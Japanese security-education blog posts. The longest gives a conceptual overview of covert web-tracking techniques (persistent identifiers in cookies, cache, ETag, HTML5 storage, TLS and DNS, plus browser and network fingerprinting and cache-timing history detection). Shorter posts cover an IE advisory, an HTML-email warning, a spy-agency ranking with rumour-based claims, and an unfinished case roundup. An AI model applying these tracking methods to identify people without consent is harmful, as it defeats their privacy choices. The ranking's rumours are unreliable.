Web上でのユーザーを追跡する方法

検索エンジンでの私の古いクエリに応じて、Google AdSenseが頻繁にコンテキスト広告を侵入させてくることに私は常に悩まされてきた。検索したときからだいぶ時間が経ち、ブラウザのクッキーやキャッシュを何度か消去しているのにも関わらず、広告が残った。いったいどうやって彼らは私を監視し続けたのだろう?実は、これを行うための方法がたくさんあることが判明した。

まずはじめに

IDやユーザー追跡、または単にWebトラッキングは、特定のサイトを訪問する各ブラウザの一意識別子を計算し設定することを暗示している。元々はここまで悪用されるとは予想だにせず、他のものと同じく、役に立てるようにとまったく逆に考えられたものだった。たとえば、サイト所有者がボットと普通のユーザーを区別したり、ユーザー設定を保存し、二度目以降の訪問でもそれらを使用できる機能を提供するためだ。しかし同時に、この機能は広告業界に非常に好まれてしまった。あなたも良く知っているように、クッキーはユーザーを識別するための最も一般的な方法の一つである。積極的に広告業界で使われ始めたのが90年代半ば頃だ。

その時から多くのことが変わり、技術ははるか先へと進んだ。現在では、ユーザー追跡はクッキーだけに限られない。実際には、いろいろな方法でユーザーを識別することが可能だ。一番ハッキリした方法は、クッキーに似た識別子を設定することだ。次のやり方は、要求を送ったHTTP­ヘッダから収集することができるPCユーザーによって利用されたデータを活用することである。アドレス、使われたOSタイプ、時間など。そして最後に、ユーザーの行動及び習慣(カーソル移動、サイトのお気に入りセクション、等)によってそのユーザーを区別することができる。

明示的な識別子

このアプローチでは、必要とされるすべてのことが大変にハッキリしている。リソースの二度目以降の訪問の際に確認することができる長い間存在した識別子をユーザー側で保存する。最近のブラウザは、ユーザーに対して透過的にこれを実現させる方法をいくつも提供している。何よりも古い親切なクッキーがそれだ。そして、いくつかのプラグインの特徴はクッキーの機能に近い。例えば、フラッシュのLocal Shared Objects 、あるいはシルバーライトのIsolated Storageである。HTML5もクライアント側でいくつかのメカニズムを持っている。localStorage、File、IndexedDB APIなどである。これらの場所以外に、ユニークなマーカーはローカルマシンまたはメタデータキャッシュのキャッシュされたリソースに保存できる。(Last­Modified、ETag)

また、SSL­接続用ブラウザによって定義づけされているOrigin Bound Certificatesから取得した描画、SDCH辞書に含まれるデータ、これらの辞書のメタデータなどからユーザーを識別することが可能である。一言で言えば、やり方は充分すぎるほどあるのだ。

Cookies

クライアント側でそれほど大きくないあるデータ容量を保存することになった場合、まず一般的に考えるのがクッキーだろう。Webサーバーはクッキーに新しいユーザーの一意識別子を保存しながらそれを設定し、それ以降のすべての要求について、クライアントがその識別子をサーバーに送信する。すべての人気あるブラウザは、クッキーで管理された便利なインターフェースによってだいぶ前から提供されているにも関わらず、ネットにおいてはクッキー管理やクッキーブロックのための外部ユーティリティが溢れかえっているのに、クッキーは依然としてユーザー追跡のために活発に利用され続けている。実は、クッキーをチェックして消去する人は結構少ないのだ。(あなたがそれを最後にやったのはいつだったか思い出してみてほしい)おそらくその主な理由は、たとえば認証に使用することができるような必要な「クッキー」を間違って削除するのを皆恐れているのだろう。一部のブラウザでは、サードパーティクッキーの設定を制限することが出来るのに問題は消えず、ブラウザはちょくちょく、ページコンテンツのロード中にHTTPリダイレクトや他の方法を介して受信されたクッキーを「ネイティブ」だと考えてしまう。後で述べるメカニズムの多くと異なるのは、クッキーを使うことがエンドユーザーにとって透過的なことだ。ユーザーを「指定」するためには、必ずしも別のクッキーに一意識別子を保

存する必要はない。いくつかのクッキーの値から収集することもできるし、又はExpiration Timeのようなメタデータに保存することもできる。したがって、この段階でトラッキングするために特定のッキーが使われているのかどうかを把握することは非常に困難である。

ローカル共有オブジェクト

クライアント側でデータを保存するためにAdobe FlashではLSOのメカニズムが使われる。これはHTTPのクッキーのアナログであるが、最新のものと異なり、テキストデータの短い断片を保存することができるだけでなく、何よりもそのようなオブジェクトの分析とチェックを複雑にする。10.3バージョンまでは、フラッシュクッキーの行動はブラウザの設定とは別に調整されていて、macromedia.comサイト上にあるフラッシュ設定マネージャを訪問する必要があった。(ちなみに今もこのリンクで設定できる) 今日では、コントロールパネルから直接行うことができる。さらに最近のブラウザのほとんどはフラッシュプレーヤーとの密接な統合を保証しており、クッキーや他のサイトのデータを削除するときにLSO削除される。一方、ブラウザとプレーヤーの相互作用はまだそれほど密接ではないので、ブラウザ内の外部クッキーのポリシー設定がフラッシュクッキーにいつも反映するわけではない。(Adobeサイトで手動でオフにする方法を見ることができる)

 

FirefoxでのlocalStorageからデータを削除

Silverlightの分離ストレージSilverlightのソフトウェアプラットフォームは、Adobe Flashとの共通点がたくさんある。フラッシュのLocal Shared Objects のアナログとなるのはIsolated Storageと呼ばれるメカニズムだ。実際、フラッシュと違ってプライバシー設定がブラウザにはまったく縛られない。だからブラウザのクッキーとキャッシュを完全消去した場合であっても、Isolated Storageに保存されているデータはどちらにせよ残る。ただもっと興味深いのは、ストレージがすべてのブラウザウィンドウ(「シークレットモード」で開いた場合を除く)や同じマシンにインストールされているすべてのプロファイルで共有されていることだ。LSOのように、技術的な観点からすると、ここにはセッション識別子を保存するための障害は何も存在しない。しかも、ブラウザ設定を通じてこのメカニズムにアプローチできないことを考えると、このメカニズムは一意識別子用のストレージとしてそれほど広く展開することなかった。

 

どこでSilverlightの分離ストレージを探すか

HTML5とクライアント上のデータ保存

HTML5は、クライアント上で構造化データを保存するための一連のメカニズムである。これに相当するのがlocalStorage、File API、IndexedDBだ。違いはあるものの、これらはすべて、特定のリソースにバインドされたバイナリデータの任意の部分を永続的に保存できるように設計されている。加えて、HTTPやFlashクッキーとの違って、保存されたデータの量に有意な制限はない。最新のブラウザにおいてHTML5のストレージはサイトの他のデータと一緒に位置している。しかし、ブラウザ設定を介してのストレージの管理の仕方を推測することは非常に困難である。たとえば、 FirefoxのlocalStorageからデータを削除するために、ユーザーはoffline website dataかsite preferencesを選択し、everythingと同等の期間を設定する必要がある。さらにもう一つのIE特有の変わった機能は、データがそのデータ保存時に開いているタブの存続期間中のみ存在することだ。これに加えて、上記のすべてのメカニズムは、HTTP­クッキーに適用される制限に従おうとはしない。たとえば、localStorageに記述して、外部クッキーを切った状態であってもクロスドメインフレームを通してlocalStorageから読み取ることができる。

 

Flash Playerのためのローカルストレージ設定

キャッシュされたオブジェクト

皆、ブラウザが速やかに、止まることなく動作することを望んでいる。だから、ブラウザは訪れたサイトのリソースをローカル・キャッシュに保存しなければならなくなる。(二度目以降の訪問でそれらを要求しなくて済むように) このメカニズムは明らかにランダムアクセスのストレージとして使用されるためのものではないのだが、そのように変換することが可能である。例えばサーバーは、ボディ内部の一意識別子を伴ったJavaScriptドキュメントをユーザーに戻し、Expires/max­age=ヘッダに遠い未来を設定することができる。このようにしてスクリプト、そしてそれと共に一意識別子がブラウザのキャッシュに登録される。その後、既知のURLからスクリプトのダウンロードを要求し、ウェブ上の任意のページからアクセスすることができる。もちろんブラウザは、スクリプトの新しいバージョンがあるかどうか、定期的にIf­Modified­Sinceヘッダを使って確認する。しかし、もしサーバーがコード304(Not modified)を返してきたら、キャッシュされたコピーが永遠に使用できるようになる。他にキャッシュの面白いところは何か?ここではHTTPクッキーのような「サードパーティ」のオブジェクトという概念はない。同時に、キャッシュを無効にすると真剣にパフォーマンスに影響を与えることができる。いくつかの識別子/ラベルを保存しているリソースの自動検出は、ウェブ上で良く見られるJavaScriptドキュメントの複雑さや容量の大きさに起因して困難になる。もちろんすべてのブラウザは、ユーザーが手動でキャッシュを消去できるようになっている。ただ、経験(自分を例にする)から言うと、もしその作業をしているとしても、そんなに頻繁には行わない。

ETagとLast­Modified

キャッシュが正しく動作するには、ドキュメントのより新しいバージョンがあることをブラウザが何とかサーバーに通知する必要がある。標準のHTTP/1.1は、この問題を解決する2つの方法を提供している。一つ目は、ドキュメントの最終変更日に基づいて、二つ目は、ETagとして知られている抽象的識別子に基づいた方法である。ETagの場合、サーバーは文書と一緒にある応答ヘッダのいわゆるversionタグを最初に返す。指定されたURLへの二度目以降の要求の際、クライアントはIf­None­Matchヘッダーを介してローカルコピーに関連付けられた値をサーバに伝える。このヘッダーで指定されたバージョンが有効であれば、サーバーはHTTPコード304(Not modified)で応答し、クライアントが安全にキャッシュされたバージョンを使用することができる。その逆の場合、サーバーは新しいETagを伴ったドキュメントの新しいバージョンを送ってくる。このアプローチはどこかHTTPクッキーに似ている。サーバーはクライアントの任意の値をあとで計算するためだけにその値を保存する。Last­Modifiedヘッダを使ったもう一つの方法は、のちのちIf­Modefied­Sinceヘッダ内でクライアントによってサーバーに送られる日付文字列内のデータの少なくとも32ビットを保存することができる。興味深いのは、ほとんどのブラウザは、この列が正しい形式で日付を表示する必要がないことだ。キャッシュされたオブジェクトを介してユーザ認証をする場合と同様、クッキーとサイトデータの削除はETagとLast­Modifiedにまったく影響を与えず、キャッシュをクリアにすることによってそれらを取り除くことができる。

 

サーバーはクライアントにETagを返す

HTML5 AppCache

Application Cacheは、ユーザーがオフラインの場合でも、サイトのどの部分をディスクに保存し、利用できるようにしなければならないかを指示することができる。キャッシュのアイテムを保存し、取得するためのルールを設定するマニフェストを使ってすべては管理される。今までのキャッシュのメカニズムと似ているのは、マニフェスト内部と同じように、無期限に保存されているリソース内でAppCacheもユーザーに依存した一意なデータを保存することができることだ。(従来のキャッシュとの違いは、キャッシュからのリソースがある程度時間が経つことで消去されるところ) AppCacheは、HTML5でのデータ保存のメカニズムとブラウザの従来のキャッシュとの中間の値を占める。一部のブラウザでは、クッキーとサイトデータを削除する際にクリーニングされるが、その他は、閲覧の履歴やキャッシュされたすべての文書を削除するときだけだ。

SDCH­辞書

SDCHは、 サーバーによって提供される辞書の使用を基本に、Gzipやdeflateよりも高い圧縮レベルを達成することができたGoogleの圧縮アルゴリズムである。実は普段ウェブサーバーは、ページのヘッダ/フッタ、内蔵JavaScript / CSSなど、あまりにもたくさん繰り返される情報を与えている。このアプローチだとクライアントは、あとに続く応答(同じヘッダー/フッター/ JS / CSS)に表示されることがある文字列を含む辞書ファイルをサーバーから受け取ることになる。その後、サーバーは辞書内のこれらのアイテムを参照することができ、クライアントはそれに基づいて自分でページを収集するようになる。お分かりのように、これらの辞書は、Avail­Dictionaryヘッダ内のサーバーへクライアント自身で返された辞書のIDにも、コンテンツ自体にも直接置くことのできる一意識別子を保存するために、簡単に利用することができる。そしてその後で、ブラウザの従来のキャッシュの場合と同様に使用しようする。

その他の保存メカニズム

しかし、方法はこれで全部ではない。JavaScriptとその同類の仲間を使用して、すべての閲覧履歴やサイトデータを削除した後でさえ存続できるような形で一意識別子を保存し、取得することができる。その方法のひとつは、保存のためにwindow.nameまたはsessionStorageを使うことだ。たとえユーザーがすべてのクッキーとサイトデータを削除しても、追跡サイトが開かれたタブを閉じなかったら、二度目以降のエントリーの際、サーバーによってトークンが受信され、ユーザーは再びそれについて既に収集されたデータに関連付けられてしまう。同じような動作がJSでも観察され、開いているあらゆるJavaScriptコンテキストは、ユーザーがサイトデータを削除した場合でも状態を保存する。この場合、このようなJavaScriptは表示サイトに属するだけでなく、iframeやウェブワーカー内に潜むことができる。たとえば、iframeにダウンロードされた広告は閲覧履歴やデータの削除にはまったく関係なく、JS内のローカル変数に保存されたIDを使用し続ける。

プロトコル

JSや色々なプラグインの利用、キャッシュに関連するメカニズムに加えて、最新のブラウザでは一意識別子の保存および取得を可能にするいくつかのネットワーク機能がある。

1. Origin Bound Certificates(別名Channel ID) ­ クライアントを識別するHTTPSサーバへの永続的な自己署名証明書。それぞれの新しいドメインのために、後に開始する接続に使用する別の証明書が作成される。サイトはユーザー追跡のためにOBCを使用することができ、その際クライアントに気づかれるような何かしらのアクションを実行しない。一意識別子として、正当なSSLハンドシェイクの一部のようにクライアントが提供する証明書の暗号ハッシュを取得することができる。

2. 同様に、TLSにも2つのメカニズムがある。完全なハンドシェイクを実行せずに、中断したHTTPS接続をクライアントによって再開することができるsession identifiersとsession ticketsである。これは、キャッシュされたデータを使用することによって達成される。これら2つのメカニズムは、一人のクライアントからの要求をサーバが短時間で識別することを可能にする。

3. 事実上、すべての最新ブラウザでは名前解決のプロセスをスピードアップするための独自の内部DNSキャッシュを実装する。(場合によっては、DNS rebinding攻撃のリスクを減らす)。このキャッシュは少量の情報を保存するために簡単に使用することができる。例えば、もし16個のIPアドレスを持っている場合、8~9個のキャッシュされた名前でネットワーク上の各コンピュータを識別するのに十分であろう。しかし、このアプローチは、ブラウザの内部DNSキャッシュのサイズによって制限され、名前解決においてDNSプロバイダとの衝突につながる可能性が潜在的にある。

マシンの特徴

ここまで見てきたすべての方法は、ユーザーが二回目以降の要求のためにサーバーに送信される何らかの一意識別子を設定するということが基本になっている。他に、クライアントのマシンの特徴の要求または測定によるユーザー追跡のあまり目立たないアプローチがある。単独だとそれぞれが得た特徴は情報の数ビットだが、もしいくつかを組み合わせた場合、それらは独自にインターネット上のあらゆるコンピュータを識別することができる。しかもそのような追跡を見分けて防止するのは非常に難しいことから、この技術は様々なブラウザやプライベートモードを使用しているユーザーを識別することができてしまう。

ブラウザの「描画」

トラッキングの最も簡単な方法は – 各オプションが別々だとそれぞれは反応しないのに、それらが一緒になると各マシンに固有の値を形成するといった、ブラウザ環境で利用可能なオプションのセットを組み合わせることで識別子を構築することだ。

∙ User­Agent。ブラウザ、OSのバージョン、およびインストールされたアドオンのいくつかを配布。User­Agentが見つからないか “本物”であるかをチェックしたい場合、実装された、あるいはリリース間で変更された特定の機能をチェックすることでブラウザのバージョンを確認することができる。

∙ クロックシステム。もし、システムがサーバー側の時間とクロックを同期していない場合、クロックはJavascriptを使ってマイクロ秒まで正確に測定することができるシステムタイムとリアルタイムの間のユニークな違いを生じさせ、遅かれ早かれ、進んだり遅れたりし始める。実際に、NTPサーバーと同期する場合であっても、どちらにしても測定することができるような小さな変化が生じる。

∙ CPUとGPUに関する情報。これは直接(GL_RENDERERを通じて)か、JavaScriptで実装されたテストとベンチマークを通じて得ることができる。

∙ 画面解像度とブラウザウィンドウのサイズ(マルチモニタシステムの場合の第2のモニターのパラメータを含む)

∙ たとえば、getComputedStyle APIを使用して取得したインストールされているフォントの一覧。

∙ バージョンも含めたすべてのインストールされているプラグイン、ActiveXコントロール、BrowserHelper Object などの一覧。navigator.plugins[ ]探索を使って得ることができる。(一部のプラグインはHTTP­ヘッダー内にその存在を配布)。

∙ インストール型拡張機能、およびその他のソフトウェアに関する情報。広告ブロッカーのような拡張機能は、拡張の種類やその設定を決めることができる現在のページに一定の変更を行う。

ネットの「描画」

さらに、ローカルネットワークのアーキテクチャやネットワークプロトコルの設定においても様々な兆候が見られる。そのような兆候は、クライアントマシンにインストールされているすべてのブラウザで見受けられるようになり、単にプライバシー設定または一部のセキュリティユーティリティでそれらを隠すことはできない。次のようなものがそれだ。

∙ 外部IPアドレス。IPv6アドレスの場合、このベクターは特に興味深い。場合によっては最後のオクテットがデバイスのMACアドレスから得られ、したがって異なるネットワークに接続された場合であっても保存することができる。

∙ 発信TCP / IP接続のポート番号。(通常、ほとんどのOSに一貫して選択される)

∙ NATまたはHTTPプロキシの背後にあるユーザーのためのローカルIPアドレス。外部のIPアドレスと一緒になって独自に顧客の大半を識別することができる。

∙ HTTPヘッダ(X­Forwarded­For)から得たクライアントが利用するプロキシ∙サーバの情報。いくつかの可能なプロキシをバイパスする方法で受信したクライアントの実際のアドレスとの組合せでも、ユーザーを識別することができる。

行動分析や習慣

そしてもう一つのやり方は、PCではなく、地域の設定や行動などのエンドユーザーに関連する特性を見ることだ。このような方法も、プライベートブラウジングの場合においての様々なブラウザセッション、プロファイル間でクライアントを識別することが可能だ。研究のために常に利用可能である以下のデータに基づいて結論を出すことができる。

∙ 優先言語、デフォルトのエンコーディングおよびタイムゾーン(すべてはHTTP­ヘッダ内にあり、JavaScriptから得られる)

∙ クライアントのキャッシュ内のデータと閲覧履歴。キャッシュの要素は、時間の攻撃により検出することができる。追跡者は、単にダウンロードの時間を計測することにより、人気のあるリソースに関連するキャッシュの長寿命の要素を検出することができる。(時間が予想されるローカルキャッシュからのダウンロード時間を超えた場合、動作をキャンセルする) また、ブラウザの履歴に保存されたURLを抽出することもできるが、そのような攻撃は最新のブラウザではユーザーのちょっとした操作を必要とする。

∙ マウスジェスチャー、キーストロークの頻度および持続時間、加速度計データ ­ これらのパラメータのすべては、各ユーザーに固有である。

∙ サイトの標準フォントの変更とそのサイズ、zoomのレベル、テキストの色、サイズなどの特別な機能の使用。

∙ クライアントによってカスタマイズされたブラウザの特定の機能のステータス:サードパーティクッキーのブロック、DNS prefetching、ポップアップブロッカー、Flashのセキュリティ設定など(皮肉なことに、デフォルトの設定を変更したユーザーは、実際には、自分のブラウザを簡単に識別できるようにしてしまう)これは、表面的に存在する明らかな方法である。もしもっと掘り下げたい場合は、さらに方法を思いつくことができる。

まとめ

ご覧のように、実際には、ユーザーを追跡するためのさまざまな方法がある。それらのいくつかは、実装の間違いや欠落の結果であり、理論的には補正することが可能となる。他の方法となると、コンピュータネットワークの原理やウェブアプリケーション、ウェブブラウザを完全に変更をしないことには、実際に根絶することは不可能である。何らかの技術で対抗できるのは、キャッシュやクッキー、または一意識別子を保存することができる他の場所をきれいにすることだ。他は、ユーザーには完全に気づかれないように作動し、それらからの防御はまず上手くいかない。したがって最も重要なことは、プライベート閲覧モードでのネットサーフィンであろうと、あなたの動きはどちらにしても追跡されていることを覚えておくことだ。390870_3121815863768_2033907823_n

 

 

 

IEに脆弱性発覚! XPユーザーはサポート終了で打つ手なし、ブラウザ切り替え必須

a5ae5b6f

 

Internet Explorer 6から11までの全バージョンに関わる脆弱性の存在を
Microsoftが発表
しました。対象OSにはWindows 8.1や
Windows Server 2012などほぼすべてのWindows OSで、
当然、2014年4月9日にサポートが終了したWindows XPも含まれていますが、
マイクロソフト セキュリティ アドバイザリの適用はありません。

Microsoftが発表した脆弱性は、削除したメモリや適切に割り当てられていない
メモリ内のオブジェクトにアクセスされることで、リモートでコードが
実行されるというもの。攻撃者はIEのこの脆弱性を利用して、
偽のサイトを表示させユーザーをだましてリンクをクリックさせてコードを
実行させることが可能となる
とのこと。対象ブラウザはIE6からIE11までの
全バージョンで、対象OSは最新OSであるWindows 8.1やサーバーOSである
Windows Server 2012などほぼ全てのWindows OSです。

IEのFlashプラグインを無効にすることが有効な対策であると明らかにしています。

 

Microsoftはこの脆弱性に対して臨時更新プログラムを提供する予定ですが、
サポートが終了したWindows XPにはパッチは提供されない見込み。
そのためWindows XPのユーザーは、少なくとも今後12カ月間は
サポートが継続されるGoogle ChromeやFirefoxのようなブラウザへの
切り替えによって対処するしか方法はなさそう
です。
http://gigazine.net/news/20140428-retire-windows-xp-vulnerability-on-ie/

意地でもXPを使い続ける場合はブラウザ切り替えが急務です。
( ´・ω・)y─┛~~~oΟ◯

images
本当は実力NO,1の呼声高い「Opera」、URLの表示スタイルなどを変更した 「Opera Next 21」を公開 !

001559
Firefox 29.0 Beta1 最新版がリリース!!

index
 「Google Chrome 33」 最新アップデートが公開!複数のセキュリティ問題を修正、ユーザーはアップデート推奨

6 (2)
2014年3月のブラウザシェアやOSシェアが発表!今もっとも使われているブラウザは?

 

情報セキュリティ講座20回達成!雑感及び更なる目標

我々WhitehackerZ養成学院の理念である『全ての人にセキュリティ教育を!』が徐々に浸透してきております。全国をセキュリティの伝道師として講演・実習講座を重ね続けております。御賛同して下さっておられる方々にこの場をお借りして厚く御礼申し上げます。

これまでのべ20回を超える講座を開催してきて特に思う事が2つあります。
一つは、冒頭申し上げた理念に間違いはないと確信がより深くなったこと。
もうひとつは、人と人があうという事の重要性。

一つ目は、詳しく述べるまでもありませんが、超高度教育よりも底辺層の底上げが重要だという事を日々感じております。この記事をご覧になっておられる方々には信じなれないかもしれませんが、未だにwifiでwepを使用していたり、法人の経理のPCがXPを使用していおりまた買い換える気もない、などなど。。
勿論事業規模に合わせて経営計画していくことが望ましいのは言うまでもありませんが、我々が接するなかではそうではなくただ単に知らないからなど知識の有無の問題も特に多いかと思っております。
確かに、インターネット用語は年配層には特に難しく、我々セキュリティ業界人からすると、あれだけ様々な注意喚起が日々なされているのに何故?と思う事もありますが、そもそもそれらの層の方々の目にすら止まっておりません。
XPに至っては、2014/4/1より電源が入らなくなる、と思ってた人が事実いらっしゃいました。

これらの方々を見殺しにするのか?否!我々こそが救世主となり真の情報セキュリティを広めて行く覚悟でございます。これからも全国津々浦々啓発活動に邁進いたします。

まずは目指せ講演100回達成です。unnamed (1)unnamed (2)unnamed (3)unnamed (4)unnamed (5)unnamed (6)unnamed (7)unnamed (8)

世界の対外諜報機関ランキング【トップ10】スパイ

諜報活動とは政治や治安、経済や軍事上の目的などのために、相手国や対象組織の情報を収集する活動なので、情報機関はいろんなジャンルごとに各国にいくつも存在するので、特に対外諜報機関のランキングとなっています。

いわゆるスパイのことですね。日本でそれにあたるのは公安警察か公安調査庁か内閣情報調査室(CIRO サイロ)そして防衛省情報本部(DIH)であろう。しかし海外の諜報機関に比べて規模が格段に小さい(実際の規模は秘匿されているとも)。また特殊工作(暗殺や破壊工作など)は行っていないとされる。

第二次大戦までは陸軍中野学校が著名である。諜報活動の専門学校であった。現在日本にはスパイ活動を取り締まる法律すらなく、特定秘密保護法という法案の成立が目指されている。それによって新しい組織が作られるか、DIHの規模や活動を拡大させるかといった動きがありそうだ。

それでは、世界の対外諜報機関のランキング、トップ10をご紹介します、どうぞ。

10.オーストラリア ASIS エイサス

オーストラリア・シークレット・インテリジェンス・サービス。対外情報の収集、分析、諜報・防諜活動(スパイ活動)を担っている。主にアジア・太平洋地域にエージェントを駐留させさまざまな情報を集めている。国内の防諜組織としてASIO(エイジオ)があり、こちらの方が知名度は高い。

australian-ASIS-600x479_s

9.インド RAW

リサーチ・アンド・アナリシス・ウイング。インドにもいくつかの情報機関があるがRAWが最強の特務機関と言われている。その機構、編成、予算、定員は、国家秘密であり議会からも秘匿されている。対外情報機関であるがその主な敵はパキスタンであろう。パキスタン国内に3万5千人のエージェントが送り込まれているといわれている。

indian-raw-600x391_s

 

8.フランス DGSE 対外治安総局

Direction Générale de la Sécurité Extérieure。フランスの対外諜報・情報機関である。1985年、フランスの核実験に抗議するグリーンピース(環境保護NGO)の帆船レインボー・ウォーリア号を爆破した事件はDGSEによるものといわれている。

french_dgse-600x380_s

7.ロシア FSB ロシア連邦保安庁

冷戦時代にアメリカCIAと双璧をなす最強の諜報機関であったKGBは世界的に有名である。そのKGBがソ連崩壊とともに解体されFSBに権限が移行された。もとKGBの諜報員で現ロシア大統領のウラジミール・プーチンは第4代FSB長官である。KGBのような伝説的な事柄はまだほとんど知られていないが、おそらくその能力は物凄いものであろう。

russia-fsb-600x479_s

 

6.ドイツ BDN ドイツ連邦情報局

1955年、第二次世界大戦中の対ソ情報機関であるゲーレン機関を基に創設された。7000人を超える職員がおり2000人が国外に派遣され諜報情報活動に従事している。その情報収集能力をはじめとした総合的な実力は今やCIAをしのぐともいわれており、アメリカの情報局はことあるごとにBDWに情報提供を求めるようだ。

german-bnd-600x479_s

 

5.中国 MSS 中国国家安全部

MSSは国内の安全保障にも関与している組織であるがその対外諜報活動もかなり活動的で、近年ますます影響力を増しているという。特に力を入れているのが海外の最先端技術の情報を盗む活動だという。企業は普通、国家に依存せずビジネス戦略を展開するものだが、中国の企業は国家の情報機関と密接に関係しているという。スパイ活動はもっとも手っ取り早く海外の先端技術を盗む手段と考えているのだろう。世界の企業や政府がサイバー攻撃を受けた事例はあとをたたない。

chinese-MSS-600x378_s

 

4.イスラエル モサド イスラエル諜報特務庁

一部では世界最強・最恐の諜報機関とまでいわれている。世界各国に存在するユダヤ人から情報を得られることがすでに強みであるが、それ以上にモサドの局員は優秀であり諜報のスペシャリストが揃っている事が最大の強みであろう。採用の基準は厳重で高く、3~4年の期間をかけて心身の強者を見分けているようだ。暗殺工作員(キドン)に息の根を止められた人物は何人に登るだろうか。「黒い九月」に対する報復作戦が有名。また、ドイツ人戦犯の逃亡者を探し出し誘拐することでも有名(アイヒマン誘拐事件)である。

israel_mossad-600x355_s

 

3.パキスタン ISI パキスタン軍統合情報局

Inter-Services Intelligence。アフガニスタン紛争のころからその暗躍が注目されている。ソ連のパキスタンへの侵攻をゆるさず、またアフガニスタンのイスラム義勇兵を協力にサポートした。その後もタリバンやアルカイダの後ろ盾となり訓練や育成を行い、いくつものジハード(自爆テロ)を指示しているとの疑いがもたれている。中東情勢、イスラム原理主義者たちの動きにはISIの関与が大きいのは間違いないようだ。

Pakistan-ISI-600x395_s

 

2.イギリス MI6(軍情報部第6) 正式にはSIS・情報局秘密情報部

Military Intelligence section 6。『007』の作者イアン・フレミングは元MI6の諜報員であった。ジェームズ・ボンドによってMI6の名は世界的に有名であろう。第二次大戦期にはドイツのSSやゲシュタポと渡り合い、諜報戦を制したといえる。冷戦以降はソ連KGBとの熾烈な諜報合戦を繰り広げた。ソ連のダブルスパイには相当な打撃を受けもした。現在はCIAと協力し中東での諜報活動が活発である。

uk-flag-600x398_s

 

1.アメリカ CIA 中央情報局

Central Intelligence Agency。諜報機関の代名詞とも言える組織である。アメリカには情報機関が多数ありインテリジェンス・コミュティーを形成しているが、その頂点でもある。エージェントは報道関係者以外のあらゆる職種に組み込み全世界に配置しているといわれている。各国の親米政権の樹立工作や、要人暗殺の例は枚挙に暇がない。世に知られていないでCIAが関与している事件は相当にあるだろう。近年ではイラク戦争では大量破壊兵器の存在を主張して戦争に持ち込んだりといった失態もある。一方ウサマ・ビン・ラディンの潜伏先をみごと特定する成果を挙げている。

american-cia-600x450_s

TalkFusionというMLM企業が押し進めるHTMLメールの危険性

昨今、マルウェア感染防止の観点から、またインターネットを使用するもののエチケットとしてHTMLメールは使用しない事は周知の事実ではありますが、危険極まりない事を推し進める企業が発生しておりますのでお知らせいたします。

TalkFusion(トークフュージョン)という会社なのですが、ビデオコミュニケーションツールの提供をMLMビジネスにて展開している企業の様です。ここではMLMという事については触れません。ビデオコミュニケーションのツールを多く提供しているという事なのですが、目玉として扱っているのが何と、HTMLメールなのです。

http://www.talkfusion.com/jp/

talkfu001

talkfu002

http://www.talkfusion.com/jp/for/templates/

そもそもこちらの会員様はHTMLメールの危険性を御理解されているのでしょうか?

HTMLメールの危険性について総務省主導で2013/10/01にたちあがった

ACTIVE  http://www.active.go.jp/active/group.html

にての記載を引用します。

HTMLメールのプレビューは非常に危険!HTMLメールとは、Webページのレイアウトなどで使われるHTMLで記述されたメールのことで、Webページと同じように文字の色や大きさを自由に変えたり、絵や写真を貼りつけたり、他のWebページにリンクできるなど豊かな表現が可能になります。
しかし、この機能を悪用して、HTMLメールを開いただけ、あるいはプレビューしただけで感染するマルウェアも蔓延しています。このため、HTMLメールを見ない・使わないように設定しましょう。

とあります。またその他の団体で以下の様に撲滅にむけて取り組んでいます。

はっきりいって超危険なものなのです。

HTML形式のメールは、確かに、メールの本文の字体や文字サイズ、色などを変えて、 また、画像を表示することで、「表現力を豊かに」することができます。 このため、マーケッティングを目的としたメールでは広く活用されており、 好んで使う個人ユーザもいるようです。また、一部のメーラーでは初期設定が HTML形式で送るようになっているので、気がつかないで使っている人も いることでしょう。
しかし、HTMLメールには他のいろいろの仕掛けを仕込むことも できます。メールの中に有害な操作をするスクリプトが含まれていて受信者の 個人情報が盗まれたり、パソコンが悪影響を受けたりすることがあります (クロスサイトスクリプティング)し、ウィルスやワームが含まれていて、 受信側が感染して被害を受けるだけでなく、それをさらに他のパソコンに 感染させてしまう危険性もあります。
フィッシング(phishing)という、信頼できるサイトのように見せかけて 偽サイトにアクセスさせる手口を使う詐欺もありますが、この際に 誘いのために送られてくるメールは、ほとんど、HTMLメールです。
さらに、Webバグ (Webビーコンとも) といって、メールを読んだ日時や IPアドレスなどの情報を受信者の知らないうちに送信元や第三者に送る仕組みが 組み込まれていることもあります。この種の情報は、ウェブサイトを訪問すると 送られてくるcockieに記録された情報と突き合わせることで、メール受信者の ネット上での行動を、個人が特定できる形でかなり克明に把握することを 可能にします。

にもかかわらず、こちらのサイトhttp://tf.raku-syo.info/なんかは333212186

ほとんどの方がまだ、E-Mailは文字ベースで利用されていると思いますが、日本国内においても、近く間違いなく、文字ベースのE-Mailから動画メールやビデオコミュニケーションが主流になり急激に変わっていくと世界のIT専門家達の間で言われております。

と記載されています。確かにHTMLの動画メールではなく、映像コミュニケーションの時代になるという点に関しては大いに賛同出来るのですが、拝見するに一押しはやはりHTMLメール。大いに危険性のある企業と言わざるを得ないでしょう。

送った方も送られた方も気持ち良くインターネットを利用する為にもこうしたサービスに対しては注意喚起していくことが大事だと思われます。

遠隔操作事件についてのハッカー達の見解まとめ

パソコン遠隔操作事件で、インターネット掲示板に殺害予告を書き込んだとして威力業務妨害容疑で逮捕されたIT関連会社社員の片山祐輔容疑者(30)が逮捕されてからもうすぐ3週間になろうとしている。

逮捕前後は、片山容疑者の情報がメディアにあふれ、「ネコ男」「オタク」「非モテ」などと、興味本位に報じられることが多かった今回の事件。風向きが変わったのは、弁護人として「足利事件」で無罪を勝ち取ったことで知られる佐藤弁護士が登場してからというもの、ネットで「支援」の動きが見えけられ反転攻勢の動きを見せて来た。

メディアの風向きも変わりつつある今、一体どうなっていくのか?目が離せない状況が続いている。その間もメディアは”片山の弁護側は遠隔操作の「C#」というウイルスを片山は作る能力を持っていないと主張している。などと報じたり、起訴前だと言うのに卒業アルバムをさらすなど血も涙もないのか?批判の声にさらされている。
01c786a3

そこで今後の行方が気になる我々は著名ハッカー、IT詳しいや有識者に今後の見通しを聞いて回った。尚、回答なしが70件近くある事を申し添えると共に、質問から12時間しか経過して無い事を考慮し、追加で返答があり次第順次追加していくものとする。

当学院が行なった質問は以下である。

こんにちは。遠隔操作事件で逮捕されている片山被告が冤罪若しくは不起訴処分になった場合、その後の展開はどうなるとお考えでしょうか?by WHZ白Z

では以下見て行こう。

竹渕瑛一氏

